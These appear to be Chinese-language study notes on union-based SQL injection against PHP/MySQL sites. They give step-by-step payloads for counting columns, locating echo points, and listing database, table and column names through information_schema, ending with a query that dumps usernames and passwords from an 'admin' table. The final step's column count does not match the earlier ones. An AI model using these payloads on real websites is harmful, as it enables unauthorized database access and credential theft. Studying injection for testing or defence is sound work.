php+mysql联合查询:
判断注入点:单引号,双引号,and 1=1,and 1=2
mysql函数:
database() 查询当前数据库名字
group_concat() 将查询出来的数据值连接起来,返回一个字符串结果
mysql注入知识点:
mysql数据库默认有一张名为:information_schema的数据库,主要查schema表和tables表,schema表是用来存储该用户创建的所有数据库的库名,tables是用来存储用户创建所有数据的库名和表名,字段分别为table_schema和table_name
攻击步骤
1.确定注入点后 order by 1 ,返回正常数字1换2,一次向上加,加到页面报错。
2.如果order by 6错误,order by 5正常,即可确定字段数为5
3.查看回显点 and 1=2 union select 1,2,3,4,5 再出现数字的位置进行查数据,如页面出现数字2
4.查数据库名字:and 1=2 union select 1,database(),3,4,5 出现数字2的位置会出现数据库名字
5.查表 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=‘数据库名称’
6.查列 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=‘表名’
7.查内容 and 1=2 union select 1,group_concat(username,password) from admin